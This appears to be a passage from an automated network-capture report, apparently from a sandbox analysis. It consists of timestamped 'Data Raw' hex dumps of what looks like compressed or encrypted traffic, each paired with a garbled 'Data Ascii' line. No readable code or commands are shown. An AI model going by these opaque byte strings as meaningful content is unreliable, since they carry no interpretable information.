90 c8 aa 7f 0a a2 6b 8f c1 f0 4c bc 9c f0 01 f8 b8 e8 ad df ab 99 91 ae d6 e7 5e f6 65 54 80 3e c6 ef eb 3d 68 3e cc c4 d7 a9 cb 89 3c ce ea 30 2a 12 1f
                                                                        Data Ascii: U"ise@gu*Om/ovf+ASt%D14#'y#~Jr99A*>QA)]#>5(H)93W~Wq-#B{1o~F7|ikH:Qn y>lmrjARGvw3l27kL^eT>=h><0*
                                                                        2021-10-14 08:47:23 UTC123INData Raw: b7 1b b4 16 83 ae 2d eb 8c 51 bf c2 ca a3 5d 6f 5d 63 8c c9 63 03 e1 48 f7 18 1a b1 a9 6a 7e a4 d8 5e ca cc c3 a0 ea 97 8e de 37 b5 58 7e da 4f 83 3a 7b 07 b9 b6 78 f4 94 ad 9c 48 92 dc a9 b9 36 4c d1 f6 10 62 45 30 4e 71 24 76 f8 0f c1 3a 53 35 df 8c 2d aa c0 09 38 57 1c 2c e5 06 82 75 89 1d 86 3c 05 2b dd 07 3c 8a f4 98 0c f9 0c 20 64 7f d3 73 bf e8 7a 49 33 a0 af e0 25 42 a6 3f bc 53 68 6c 2a 18 72 c4 3f 0e 62 ba e3 9a 97 da 2c 73 4b 78 b8 03 d3 58 16 4d 3e 90 ee 57 2c 7b 58 a2 88 4c 34 d6 94 a5 99 dc 4b 7d 77 d0 86 c1 ca b4 84 df d6 44 4f ef 00 9a 43 79 49 cd e8 71 01 78 8f a8 68 3e e5 0f 0c 86 a2 49 c4 92 8c e7 4e 58 cb 92 66 16 46 c9 a8 05 af d8 89 1c 5e 41 18 f5 30 cc 6c e8 67 ef 66 d6 e9 5b c7 64 dd 0f fe 9e ed ff c3 2b 81 0a 24 aa e7 15 79 d7 38
                                                                        Data Ascii: -Q]o]ccHj~^7X~O:{xH6LbE0Nq$v:S5-8W,u<+< dszI3%B?Shl*r?b,sKxXM>W,{XL4K}wDOCyIqxh>INXfF^A0lgf[d+$y8
                                                                        2021-10-14 08:47:23 UTC124INData Raw: ca f4 6b a3 7b 12 73 e9 e3 70 a7 d2 04 51 61 33 a9 6e 24 7d a0 db 2f f8 8d 53 52 48 ca 89 b7 51 3a d2 eb ea 17 88 63 1d 50 e1 92 37 31 f4 a8 f9 9f fe 15 2a cf 7c c2 ab 75 74 27 94 9a 86 e8 23 36 9f 8e 3e 97 31 ed d0 ab a7 86 83 bf 11 aa 4f e1 78 72 6a 3f ea f5 eb 11 6c 3e c0 ca 2e a9 cb 87 2c dd 0b 3e 2f fb 1e 08 94 21 17 ff d1 92 83 63 1e 45 e3 ee 2a e3 65 e1 00 de ee a2 b5 81 61 96 0f ae a8 c4 02 eb 82 0c 8f 4c e9 0c 6d 28 81 57 21 3a e2 f0 0a 69 c4 0b 81 f1 5b 65 35 d7 d8 9d ed b4 c6 5b cb 07 35 ce 54 8f b3 0c 2e a9 24 9b 3e fd e2 75 c9 87 8f 9f 29 c0 e0 57 59 3f e8 ad e3 5b 30 71 7f ac d5 c8 a2 45 b6 78 f5 8d f2 61 65 54 51 2e 3e 14 15 3d e9 c8 9e 0c 22 4f 28 2d f2 9f 3c 9d a2 58 c8 99 2c 05 68 04 d5 f9 97 01 3f 4f 31 a8 39 c1 63 0b 83 71 cc 87 13 30
                                                                        Data Ascii: k{spQa3n$}/SRHQ:cP71*|ut'#6>1Oxrj?l>.,>/!cE*eaLm(W!:i[e5[5T.$>u)WY?[0qExaeTQ.>="O(-<X,h?O19cq0
                                                                        2021-10-14 08:47:23 UTC125INData Raw: 1a 40 ec 3f 90 e0 93 b6 4f 7f bf 78 45 21 ef 84 9c a3 e0 3e 85 a2 79 e9 4d dc 62 93 d1 5d 74 73 f3 a8 36 63 be ae 1a 3a 75 2b 7e e4 c6 16 a7 e4 0f 08 9a 6b 6c e9 99 a1 fb 51 68 8a 9e 4e 3b 56 c9 ae 2f ef a6 10 1c 5e 45 05 6f 88 e1 67 ce 17 f1 5a c9 ec 71 ea 66 d2 09 d4 c4 89 66 c2 2a 9e 24 b7 8f 90 1f 5f c9 22 bd 9f 8b 55 f8 7e 00 92 8b 8a 0a 21 f7 1f 65 41 98 07 27 e8 0b 94 f5 bd 27 d5 b5 3c 65 16 f8 9f a6 2b 1a cc da b3 3e ab 98 7e 88 2d 4d f3 58 f0 02 04 9c a1 66 82 8a 94 94 7b 68 2b 9e d8 5c c6 2e 30 6e 51 5c f3 f5 ed ac a5 3a a3 81 69 af 40 91 a7 f6 0a c2 f8 99 c1 c4 95 de 09 d7 42 c7 4b 4c ea ca 1f 75 24 2c 75 6f 3e cc d0 ed 54 43 3d 73 c3 79 e8 f0 26 db 4b 75 6d 34 b3 91 fb e5 35 26 2d 3a b6 29 15 b3 55 83 ef 7e 00 b2 30 2d e1 75 fc fc 5a 0c a0 ca
                                                                        Data Ascii: @?OxE!>yMb]ts6c:u+~klQhN;V/^EogZqff*$_"U~!eA''<e+>~-MXf{h+\.0nQ\:i@BKLu$,uo>TC=sy&Kum45&-:)U~0-uZ
                                                                        2021-10-14 08:47:23 UTC127INData Raw: ec 2c 87 e5 a3 4e 49 57 40 97 ea 9c f4 6c 55 ac af bd f0 91 86 28 a8 a9 5f 19 21 d5 cb 5f 91 83 a5 ff 2a d8 e0 57 59 24 c8 35 bd f7 3f 57 64 98 8e c6 a1 45 b2 48 30 a2 f0 6b 66 6a c5 51 b1 eb 14 35 fe d3 43 2b 0a cf b9 4f 41 be b2 9b a0 5a aa 35 00 07 6c 2a a7 91 e9 92 43 cc 34 b7 05 5e 50 24 f6 d4 d2 bf 37 a3 aa 79 72 48 6e bf b7 2d 49 0d 19 2f 54 db 71 fb 9a 06 6e 5a 2b a4 c0 28 5f bd bb 5b 00 3b 7c 6a 30 78 36 04 5b ef 4b 63 a8 cf 4f 81 cb ca 9b 17 12 f3 74 d1 ba 97 a0 13 5d 8d 4b 5d 2b e3 be e6 c9 ff a3 23 02 49 7a 22 59 c1 da cd 65 4e 15 96 b8 b0 01 ec 65 07 c6 84 3e 47 e9 a4 db d7 61 4c 6a fc 09 f8 26 ca 51 be d5 24 91 05 07 82 a5 c7 51 fa 8e 13 a2 ec b7 8b 5e af b4 5e 69 cb 63 17 61 1a 08 9f ad 54 db 13 b3 9e 48 83 e7 8f c8 14 48 fb 9a 7d eb 55 20
                                                                        Data Ascii: ,NIW@lU(_!_*WY$5?WdEH0kfjQ5C+OAZ5l*C4^P$7yrHn-I/TqnZ+(_[;|j0x6[KcOt]K]+#Iz"YeNe>GaLj&Q$Q^^icaTHH}U
                                                                        2021-10-14 08:47:23 UTC128INData Raw: ef 0c 04 9c 24 48 87 a8 b0 8b 19 62 01 e4 41 5d d9 0a 07 48 c9 79 d8 d4 a1 cd 37 24 cc 9c 5e e7 d8 b4 8c d2 4e a3 04 b8 55 c4 8a d2 8f da 42 c9 6d 55 cc bb 13 f3 39 04 5c 72 58 50 df ae 25 fc 23 15 e7 fc e1 6a 03 e9 54 7b 5f 3b 93 19 d1 8f 4b a0 26 12 9f 34 72 2f 5a c0 9f c1 1e d5 14 98 eb ef d9 ca 7d 07 bd c4 bb 60 a9 80 34 60 2e 3d 4f bb af d3 44 d2 07 35 28 51 2c 09 01 14 32 43 e3 f5 8e 21 d2 12 4c 64 8a fa c2 3b 57 51 3e 26 ea 9e df 2a 3c 4d fc 68 dc 1a f5 86 a3 30 c6 76 8e 81 49 ca 7c 20 c1 86 63 11 db 22 fb af 93 2c 95 d9 9e 28 b6 aa 38 e2 d9 69 a3 7d 38 04 96 7a 71 be d7 1b 3a eb 16 84 61 18 62 cb fa 9d fe 73 46 01 43 e2 a6 b7 52 41 83 84 94 8a 8b 67 64 33 8c 08 16 36 fb 9d d6 f7 de 0c 2e cf 7c d5 bf 5d 48 27 6a 89 e1 82 5d ad 9c f0 0f 88 5c 73 88
                                                                        Data Ascii: $HbA]Hy7$^NUBmU9\rXP%#jT{_;K&4r/Z}`4`.=OD5(Q,2C!Ld;WQ>&*<Mh0vI| c",(8i}8zq:absFCRAgd36.|]H'j]\s
                                                                        2021-10-14 08:47:23 UTC129INData Raw: 12 31 d7 6b ed b0 89 dc 8a 5c 90 67 50 b9 e3 b8 cc 39 a4 17 33 24 6d f5 19 c3 e4 d7 b6 44 51 2e ac 33 9f 03 ec 7a 05 69 f8 a7 40 c3 ce 85 df 60 4c 6e 79 10 4f 12 c1 7e 09 ca 18 b1 83 7c 85 a5 d8 42 fa 8e 13 a2 ec b7 63 5e af b4 5e 69 f4 cc 8d 44 37 9c 9c 9f 78 dd 9c 23 9e 48 94 ef df cd 14 4e c9 d8 2e 70 54 26 6c 9c 72 ed f9 09 d4 0a d1 39 f7 a1 b2 8f eb 30 30 75 8f 2a cd ed a0 0a 84 72 a2 23 2d 00 ce 17 2b ab 5e cb 90 f8 0a 0c 6a e9 d3 75 97 99 5d 64 28 e9 a9 76 25 44 b7 0f 39 3b 42 6e 34 36 59 d7 2f 67 5f 39 9d 09 48 d5 0d 7b e9 78 b8 09 5a 69 13 64 18 b0 71 89 2c 6a 72 3b 59 5f 3e d0 b6 99 8c e2 38 a9 0a 51 0e d5 dd 66 b7 5c c7 51 5e 63 ab 00 6d b4 94 a4 17 77 2b 58 41 9b 68 3e f2 27 21 84 f1 4f ee 10 f9 7e 4f 58 91 b2 f1 16 54 c9 32 20 98 c9 af 3d c9
                                                                        Data Ascii: 1k\gP93$mDQ.3zi@`LnyO~|Bc^^iD7x#HN.pT&lr900u*r#-+^ju]d(v%D9;Bn46Y/g_9H{xZidq,jr;Y_>8Qf\Q^cmw+XAh>'!O~OXT2 =
                                                                        2021-10-14 08:47:23 UTC130INData Raw: f1 23 25 c1 99 7a f0 e0 a5 98 a0 5e 93 bb 2d 05 6c b6 a8 d6 85 2d 62 6a 30 a8 3d e4 51 01 f8 f2 d2 91 3f 1f aa 79 74 79 c0 ec 2c 2c 4f 23 53 f6 cd da 71 65 a0 12 e6 59 26 0d e6 37 66 bd 17 51 00 3b 7f 4b 35 57 34 02 77 af b3 84 30 ce 4b 9a d1 f8 be 3a 1c 4f 4e c6 88 2d 82 bb 5d 90 63 50 6a eb b8 cc bc 91 12 0f 00 4d 63 33 41 9a 6e c2 43 55 0e 1f 1b b2 01 76 59 02 fa a0 1e e8 c3 ca a5 6e 33 44 6e e3 2e 4a 2e e5 5e 9e e0 9a cf 3a 04 82 a1 f8 f2 d2 a3 11 38 cf b0 f0 06 16 1f 5e 6d d4 7e d5 4c 37 06 a3 9a 44 f9 bc b7 b4 ca ea 56 a3 ca 10 6e 7a f0 03 72 ce 05 6b 0f 2a 54 53 09 d0 2a 62 65 ff a1 28 b4 ee 0c 14 55 1a 00 4f 93 19 74 83 76 82 92 05 2d cc 8d 08 ac cd 93 29 55 0a 08 4a 5d b7 7d 97 03 61 61 14 cd 89 e4 0f c2 c9 b6 be 3c 46 4e 87 1e 74 d5 b5 44 58 a9
                                                                        Data Ascii: #%z^-l-bj0=Q?yty,,O#SqeY&7fQ;K5W4w0K:ON-]cPjMc3AnCUvYn3Dn.J.^:8^m~L7DVnzrk*TS*be(UOtv-)UJ]}aa<FNtDX
                                                                        2021-10-14 08:47:23 UTC131INData Raw: e5 6a 1c d5 6c 7e 70 39 95 35 7d 9b ac 38 27 16 bb e6 15 b5 7f 77 b4 ca 13 94 14 ff ef ef d9 f1 c0 20 bf c4 a2 69 ef d3 af 61 28 13 d6 ad ac f7 69 d9 01 e4 40 71 83 97 24 39 3f 6a eb 16 8c 21 d4 18 9e 10 13 fb dd 1d 60 15 a6 03 c1 ba 7f 4b cc 6c 42 68 fc d5 ee ae 8e a8 e3 5d b6 c9 17 9c 7d 20 c5 b9 d3 81 fe 0f eb ab a4 6b b7 1a 9c 02 30 cb 84 cb f4 6f 83 ab 12 6a e8 79 55 93 c1 22 71 a1 33 a9 6e 1e 81 aa da 75 e5 50 6e 33 4a ca 8d 9f d4 39 30 eb ea 17 aa b6 60 2c e0 08 16 36 e6 9d e9 4a fe ff 2a ef 63 c1 aa 75 7a 00 42 a2 c9 e8 25 1e 1b 8e 92 96 31 ed 8d 07 a6 86 87 27 e4 ca 5d c7 5a 88 7e 3f ea df 87 1a 6d 3e d5 91 7b 85 c9 83 29 e3 73 41 a0 04 1f 06 b2 de 3a fd d2 86 11 33 8c 62 c3 39 28 e1 1e 41 6b d5 ea 8a f2 a4 49 b1 70 d1 af ee 80 96 0d 0f f4 37 c8
                                                                        Data Ascii: jl~p95}8'w ia(i@q$9?j!`KlBh]} k0ojyU"q3nuPn3J90`,6J*cuzB%1']Z~?m>{)sA:3b9(AkIp7
                                                                        2021-10-14 08:47:23 UTC132INData Raw: 3c b3 cc bd 12 20 36 b5 7e 90 d9 5e 8d 53 1f 2b bb b2 6f d1 3e cf 07 49 94 cb 82 3e 14 4e d1 6a 26 5f 45 06 66 ea 0c 74 f8 29 2e 27 42 39 ea 89 05 a8 c6 27 3c d7 62 b3 cc ed 84 55 76 72 a2 3e 9f 08 e1 06 0b a1 29 b5 09 f9 2a 0d 44 7d d3 6f bf 2e 7a 49 3f e5 0b 9c bc 45 b7 2b 9f ca 42 6e 2a 84 51 f8 3e 47 55 4d e3 90 49 f5 00 55 7c 78 a2 21 ed 4e 3e 73 14 12 9a 10 2d 6a 56 95 a9 5f 3e c7 04 91 a3 f3 18 a3 7f 2f 97 d4 fd 6f 99 ca c7 4b 76 d4 8c 2d 7a b8 36 4c 8e 76 2b 7c ee 64 68 3e e5 95 29 ab e0 6f e4 6a 87 e7 4e 78 84 9c 66 16 4d e1 85 07 b5 de a3 9f 20 d8 19 f5 a9 ec 95 e8 0a ee fc f3 ce 48 e1 44 2b 0f fe 9e d7 eb cd 2a 9a 27 05 87 bf 14 7f fd bf 88 19 87 7d d1 5c fa 94 a1 e8 ee 9d db 0e 47 7e 6b 9d 02 c5 27 a9 e4 b4 38 90 82 1d 4f 3b fc b5 26 7f e1 b3
                                                                        Data Ascii: < 6~^S+o>I>Nj&_Eft).'B9'<bUvr>)*D}o.zI?E+Bn*Q>GUMIU|x!N>s-jV_>/oKv-z6Lv+|dh>)ojNxfM HD+*'}\G~k'8O;&
                                                                        2021-10-14 08:47:23 UTC134INData Raw: 36 a7 75 46 0c fa 93 33 1b d4 b9 d9 9b fe e0 3a e7 51 c8 aa 73 4f a7 14 16 ca e8 27 14 86 f1 0b 97 ab cc 80 c4 80 a6 9c bc c1 e7 6f f3 6a 5a 7e 21 c2 d2 c1 11 6b 14 4c c9 ca a9 cb 87 0f d5 f4 3f 39 9f 3a 2f 80 2b 1a e1 d3 1c 34 3e 84 54 e3 ea 37 c0 36 4c 03 de ec a0 6b fd f8 9d 72 d5 89 d9 07 e8 94 94 d1 1e fa 2a 49 37 fb d7 20 1a dd c8 e7 6b db 08 ad c8 a7 64 25 03 5f e8 73 99 eb 5d ef 97 83 b3 d6 14 96 25 3e 8d 7f 07 3e fd e6 7d d5 95 8f 95 4b 52 c9 7a 5f 3b f8 85 1a a4 a8 70 7b aa 8e 55 a2 45 b2 ca 3d a2 e3 4d 40 5f ae 2f 28 ca 43 21 e1 e4 c2 26 0a c3 9f 56 5c 18 42 00 a1 5a b7 3d 0d 04 6c 2c 17 de ba 19 64 ec 10 a9 3d c4 55 55 e8 f2 cd 98 18 1a 85 7b 72 55 6c 10 cb b4 4e 27 77 71 ec db 71 ff 1f 1a d9 6e 20 8a c7 36 66 9d 0d 32 10 3b 60 5c 35 57 34 02
                                                                        Data Ascii: 6uF3:QsO'ojZ~!kL?9:/+4>T76Lkr*I7 kd%_s]%>>}KRz_;p{UE=M@_/(C!&V\BZ=l,d=UU{rUlN'wqqn 6f2;`\5W4
                                                                        2021-10-14 08:47:23 UTC135INData Raw: 0b b5 32 13 57 6a 79 ce 9c f2 1b c8 1d 2a a6 b0 48 c4 92 a7 09 5f 58 95 8d 42 3e 79 cb a8 03 9f 5e f7 84 5f 41 1c d5 ef cd 6c e8 90 cb 4b c4 c5 79 85 65 d2 0f de 8c e5 ff c3 35 89 12 00 a8 bd 12 53 51 43 6f 81 86 79 f5 3f 01 94 a1 72 51 95 e4 39 41 1d 90 9d 02 e5 22 a0 ea b4 27 a9 82 1d 4f 3b fc b5 26 7f e1 b3 43 b6 1e eb 86 74 12 92 45 d2 6c c9 28 5f f9 be 6d 8a ee 84 94 7d 5d 6a c8 6c 5f c6 2c 05 e3 b5 e0 df fe cf 93 eb 24 cc 98 db a7 6f 83 87 fc 2d bd 61 98 e1 a8 98 d2 93 ed 4b e3 40 51 e6 d3 47 ec 46 9d 59 6d 3a ea bc 82 2a da a6 56 ea 74 c3 4a 45 f7 44 53 52 b5 81 1f fb fa 16 11 0a 10 9b 2d 3f 33 01 74 90 e7 05 92 73 33 ef ef 43 f4 78 38 99 e4 fa 4b c7 fe 8d ce 3c 39 50 cc 11 de 44 df 21 2c 6a f7 fd 94 00 14 29 6c 83 d9 8c 21 4e 1d 0b 08 35 db 8a 3e
                                                                        Data Ascii: 2Wjy*H_XB>y^_AlKye5SQCoy?rQ9A"'O;&CtEl(_m}]jl_,$o-aK@QGFYm:*VtJEDSR-?3ts3Cx8K<9PD!,j)l!N5>
                                                                        2021-10-14 08:47:23 UTC136INData Raw: e1 77 35 2e fe af 85 f2 1c 73 7b a8 84 c8 dd dc b3 50 1c af 9a 6a 60 40 35 0a 05 fb 32 11 89 e5 d9 0e 07 ae 8a 50 76 80 14 b4 a2 5a b5 37 af 7b f5 2d 8d ff b7 62 43 cc 30 32 18 e9 64 2f d8 9b cc 87 17 12 df 6c 72 53 58 ba 98 2f 4f 21 59 d3 b3 43 70 ff 81 1f 9e 7e 06 aa 7c 12 4b 8c 0b 79 6a 3a 60 42 3d 05 23 02 71 9f 1d d7 ab cf 4d b4 73 2e 27 3b 1c d1 4b 80 9b 0b a2 89 78 bd 72 56 09 88 b9 cc a3 a1 b9 37 02 4d 7f 31 ee e6 f7 c5 69 d3 50 2f 1a b2 05 cc 10 2e eb 86 a4 64 ee db 83 6e 0c 4d 6e e3 15 e5 16 e7 5e 83 e2 35 b3 a3 03 a8 23 a6 c1 d3 a3 15 82 87 9c e1 20 ac 90 73 7f f2 7e e0 45 37 06 99 3e 7c fb bc ae 95 60 b9 cd a2 cc 3e c8 af 69 02 72 50 00 28 1f 0c 74 62 2c fd 38 64 19 99 a0 28 aa e6 b6 03 55 1c 35 c1 c5 ad 77 83 74 88 b8 7b b4 cd 17 29 a1 b3 b4
                                                                        Data Ascii: w5.s{Pj`@52PvZ7{-bC02d/lrSX/O!YCp~|Kyj:`B=#qMs.';KxrV7M1iP/.dnMn^5# s~E7>|`>irP(tb,8d(U5wt{)
                                                                        2021-10-14 08:47:23 UTC137INData Raw: 4d 91 73 be e1 4e 8b d2 93 d2 cc dc 6d 53 f9 dc 45 47 3a 04 5e 47 b8 b4 63 82 2a de 1c fc c6 66 e5 f0 26 db 56 75 52 b6 92 1f fb c5 99 2e 27 12 84 38 3d 98 7d ed 97 cd 87 cc ad 33 ef eb f9 41 54 2a bf 5e 98 67 d5 d8 8d f1 2f 39 50 f3 8a e1 69 dd 3e 23 68 5c 81 0d 07 3e ab 32 52 d9 8c 25 f4 a9 27 1a 13 61 e7 12 5a 1e 84 92 c6 90 f9 15 9d 7a 42 6c c3 14 c6 83 8c 32 c0 5a 22 91 ae 52 7d 24 e5 0b 08 8b fe 95 d1 a4 9e 60 95 88 9b 28 b6 95 cb dd f4 6b bc 77 3a 47 ea e3 76 94 51 7a c8 70 33 ad 4e ad 7c a0 da ef df 5e 57 38 68 59 8a b5 52 67 4b fd ea 13 93 4f 4d 2e e0 94 19 99 8a 22 c8 9b fa df be ce 7c ca 30 50 48 34 4c af 5f e9 23 34 bd 15 1c 97 31 f2 85 f8 a4 86 81 97 43 99 d6 e0 7a 5e 5e aa eb ff c3 8b 48 13 db 91 73 3d ca 83 2f e9 1f 28 39 05 02 2a bf 0f 3a
                                                                        Data Ascii: MsNmSEG:^Gc*f&VuR.'8=}3AT*^g/9Pi>#h\>2R%'aZzBl2Z"R}$`(kw:GvQzp3N|^W8hYRgKOM."|0PH4L_#41Cz^^Hs=/(9*:
                                                                        2021-10-14 08:47:23 UTC139INData Raw: ed 7c 2f 71 a3 13 50 e5 ea 10 4f 60 4c 4e b2 2c 62 03 fb 76 b5 c8 18 b7 89 87 fc 3c d9 58 d6 83 a7 a3 ea 9d 7b 05 1b a4 78 4d 62 5f 8d 44 17 51 a0 b2 69 e6 94 9c 9c 48 92 e5 20 b4 8d 4f d1 f4 23 c5 55 20 46 84 29 59 e9 2f f0 9d 43 39 f7 81 76 b3 c6 21 01 7d 31 28 cd eb aa f7 fd eb a3 3e 01 0d 74 16 2d 81 46 90 24 e8 2c 28 f2 7c d3 75 b7 5c 61 49 39 d3 a1 cf 27 44 b1 05 3d 42 db 6f 2a 1a 54 6c 2e 61 75 21 c6 bd 58 f3 29 e2 7d 78 b8 29 a5 55 3e 75 23 b8 c9 8b 2c 6c 78 37 20 c6 3f c7 9a 94 34 e3 3e 83 12 0a ba c5 fb 42 2d cb c7 51 7e 95 97 2d 7c 8e 9c 1f 15 77 2d 52 4c e2 f1 3f e5 0b 2c 3d f0 49 c4 08 a2 ca 5f 7e b5 29 67 16 54 e9 da 1c b5 d8 94 35 73 43 18 f3 87 4a 12 71 0b ee 62 f6 5f 58 c7 64 48 2a d3 8c d1 df 7f 2b 9a 3a 0d d3 a4 14 79 c8 25 de ad 84 7d
                                                                        Data Ascii: |/qPO`LN,bv<X{xMb_DQiH O#U F)Y/C9v!}1(>t-F$,(|u\aI9'D=Bo*Tl.au!X)}x)U>u#,lx7 ?4>B-Q~-|w-RL?,=I_~)gT5sCJqb_XdH*+:y%}
                                                                        2021-10-14 08:47:23 UTC140INData Raw: 7b 12 f0 cd ce 61 98 f3 d8 50 71 33 89 4f 25 7d a0 cd 5d d7 71 46 18 62 48 f5 2c 53 47 ad ca 37 12 8a 67 fa 09 cd 83 15 3b 29 ba c9 9b de dd 31 cf 7c d2 82 58 67 25 6c a5 4d 96 ba 35 9d f4 2b 49 30 e9 ad 4f 83 ab 95 9b e1 39 4e e1 7a 7a 5a 24 ea ff dc 1a 45 13 c8 b7 55 82 4d fd b6 c8 f5 3b 19 da 1e 02 92 97 1f d0 c0 3a 14 c1 9f 44 e3 ca 07 fa 1e 61 1e ce c2 a7 ef 83 67 b6 f4 af 30 c5 06 ec b4 ee f5 33 e8 96 4c 07 e8 f1 00 da e7 d8 e7 4b fb 1a 85 e5 ba 47 0b 04 db 96 ec b2 69 27 56 88 82 b7 f6 6f b2 08 2c 31 7a 34 2e db c6 bc 90 85 8f b5 36 5a e1 57 44 13 d3 ad 98 dc 1b f3 05 37 af 4a a7 65 50 51 18 8f 68 4e 4d 51 89 0f ca eb 14 31 c1 81 c2 0e 27 dc b7 7d 74 9e 3a b3 26 24 2a 1c 2d 01 4c cf 8c fb 97 91 67 e1 22 8e 1d 27 74 09 f8 d2 a1 9c 17 32 b7 6c 5a 7e
                                                                        Data Ascii: {aPq3O%}]qFbH,SG7g;)1|Xg%lM5+I0O9NzzZ$EUM;:Dag03LKGi'Vo,1z4.6ZWD7JePQhNMQ1'}t:&$*-Lg"'t2lZ~
                                                                        2021-10-14 08:47:23 UTC141INData Raw: 90 e4 13 09 47 43 93 7e 5c 3c c7 9e 94 5a fe 3e 83 94 07 ba d6 dd 64 bd 4c b9 c8 5f f9 8a 0d 78 90 b4 32 8d 52 06 6a e8 bc 6c 3c e5 0f 2c 5c ed 49 c4 8d 8c cf 63 5a 95 94 4c 94 2a 50 a9 05 b1 f8 8c 1f 5e 41 82 d0 80 dd 4a c8 0f ec 66 d6 c3 bc db 64 d2 14 d6 b3 f5 ff c5 00 1c 44 b4 ab bd 10 59 d1 3f f6 80 1c 58 f8 6e 26 b4 a7 ea 74 b8 d6 f5 7d 5e 91 82 0e ed 2a b0 ea b2 12 0b d4 a9 4c 3b fe bf a7 03 78 b2 d9 97 13 bd a1 54 15 0a 60 ff 5e 19 14 1b f8 a1 7b 82 8a 94 94 7b 68 f7 9e d8 5c c6 2e 0f 6d c9 79 de 64 ee 9e bf 03 ec 90 43 82 42 b1 ad c1 68 bc 7f b0 ec c2 8a d4 b9 74 11 52 6c 53 e2 f5 64 68 38 04 c2 48 13 d8 dc a3 23 d8 3c 73 e7 72 f8 6a 03 e9 4f 7b 5f 3b 93 19 d1 63 4b a0 26 12 9f 0b 1f b7 7f ed 0b c2 2c a0 12 12 e5 ed d9 d1 75 35 a2 c4 bd 55 cb d6
                                                                        Data Ascii: GC~\<Z>dL_x2Rjl<,\IcZL*P^AJfdDY?Xn&t}^*L;xT`^{{h\.mydCBhtRlSdh8H#<srjO{_;cK&,u5U
                                                                        2021-10-14 08:47:23 UTC143INData Raw: db fd 22 29 dd b6 c0 9a eb 59 55 ac af a1 f0 ae 99 0a 2c ab 7f c3 20 fd e6 42 c9 ad a2 97 54 47 cb d1 23 a2 ff af 9c fa 1a 73 7b ae 34 6f 8e 57 94 70 33 8d f2 6b 40 72 8f 2f 28 f5 4c 19 cc e6 d9 08 0d 43 e1 c9 77 9e 38 b9 8c 58 b3 1d b7 20 41 3d ab db bb 09 42 cc 10 22 1d c4 75 12 d0 df cf 87 11 18 2e 07 eb 52 46 96 95 00 4d 27 73 cb e8 f7 63 d9 a5 12 f6 7f 06 8a 69 17 66 9d 32 54 28 16 62 42 1b 50 b0 7c e8 84 35 fe 89 e1 49 9e f1 ca 9b 17 0e f3 4b c5 98 0b a2 33 c1 b0 63 70 36 ee 90 e1 a1 81 3c 08 84 33 fc 18 c3 e0 d7 ec 41 51 2e 2c 3e 9f 13 ca 5c 00 e9 86 3e 61 6a ea a5 4e 7f 41 46 ce 37 62 05 cd d8 e6 53 19 b1 a7 25 b2 a7 d8 58 48 86 3c b0 cc bd d1 22 36 b5 7e db f4 5e 8d 5b 3a 2e 94 b0 69 fd 96 37 e0 d1 95 cf a6 ea 25 4c d1 f0 99 57 79 32 60 3e 3d 76
                                                                        Data Ascii: ")YU, BTG#s{4oWp3k@r/(LCw8X A=B"u.RFM'scif2T(bBP|5IK3cp6<3AQ.,>\>ajNAF7bS%XH<"6~^[:.i7%LWy2`>=v
                                                                        2021-10-14 08:47:23 UTC144INData Raw: 96 40 a8 a7 90 be fb 3c ec e1 41 59 e6 7b 2d 65 cb e3 fb d3 d9 95 8e 74 ce 98 41 a2 b1 b3 a1 dc 77 b7 49 b5 c3 c0 8c f8 15 8c f6 ca 6d 57 c6 87 6f 6a 38 9e 7d 40 2c ec da d1 28 da 3c 53 39 44 e5 6a 1c ec 6c 7e 70 39 95 35 7d 9b ac 38 27 16 bb 78 17 b5 7f 77 b4 ca 13 94 14 61 ed ef d9 f1 4d 09 bf c4 a2 52 ef d3 af 61 28 13 d6 ad ac f7 69 d9 01 7e 42 71 83 97 24 39 3f 6a eb 8c 8e 21 d4 18 16 39 13 fb dd 2b 60 15 a6 03 c1 ba 7b 4b cc 6c 42 68 fc 4f ec ae 8e a8 e3 5d b5 c9 17 06 7f 20 c5 b9 4d a8 fe 0f ea a1 a1 44 b5 1c b0 ae c8 2c 1c ca f0 4b f5 79 12 6a 72 c6 5d ac f5 24 07 73 33 a9 4e 72 5e a0 da 6a e2 5b 6b 1c 48 cc a1 33 2c de a8 ea ee 33 dd 65 60 2c 7a b7 1e 09 d2 9b 9e 99 fe ff 0a ab 5f ca aa 6a 75 0d 47 8d cb ee 09 b2 e3 69 0a 97 35 c9 f5 d7 a6 86 1d
                                                                        Data Ascii: @<AY{-etAwImWoj8}@,(<S9Djl~p95}8'xwaMRa(i~Bq$9?j!9+`{KlBhO] MD,Kyjr]$s3Nr^j[kH3,3e`,z_juGi5
                                                                        2021-10-14 08:47:23 UTC145INData Raw: e9 9a 0b 82 35 78 90 63 6f 39 cb 95 ce a3 87 10 a4 7c d4 64 19 c7 c4 8f c1 43 51 b4 93 36 a0 27 cc 04 2d eb 86 1e 77 e6 ca a5 51 41 64 43 e1 35 64 29 61 20 01 cb 18 b5 83 7c 80 a5 d8 c2 f7 8e 03 84 ca e4 e3 20 36 95 09 48 d4 5e 92 4d 1f 2b bb b2 6f d1 3a cf 07 49 94 cb 82 b0 16 4e d1 6a 26 5f 46 06 66 64 0e 74 f8 29 b0 0f 42 39 e8 80 00 87 c4 21 10 7f 9a 54 54 ec 80 71 a3 09 a0 3e 05 b7 e9 3a 3f a7 fc ce 0b f9 0a 28 cb 58 d3 75 88 2b 50 64 3b cf 8f c8 a7 3a 2e 2e bf 38 62 12 28 1e 74 4f 0a 4c 64 9d c3 ec 4b d5 09 7b d5 5d b8 09 d7 64 13 77 3e 96 ce 0b 52 f3 53 b5 5a 7f 43 c5 9e b4 14 c7 13 92 ae 0f ea d6 dd 62 b7 60 e2 51 5e ee a6 00 7e 92 b2 18 91 09 b2 79 ce 98 48 40 e7 0f 0c 1c d4 64 d6 b4 a7 99 4c 58 95 b2 cd 33 54 c9 b7 0a 9d f5 8b 1d 58 6b 9e 8b 34
                                                                        Data Ascii: 5xco9|dCQ6'-wQAdC5d)a | 6H^M+o:INj&_Ffdt)B9!TTq>:?(Xu+Pd;:..8b(tOLdK{]dw>RSZCb`Q^~yH@dLX3TXk4
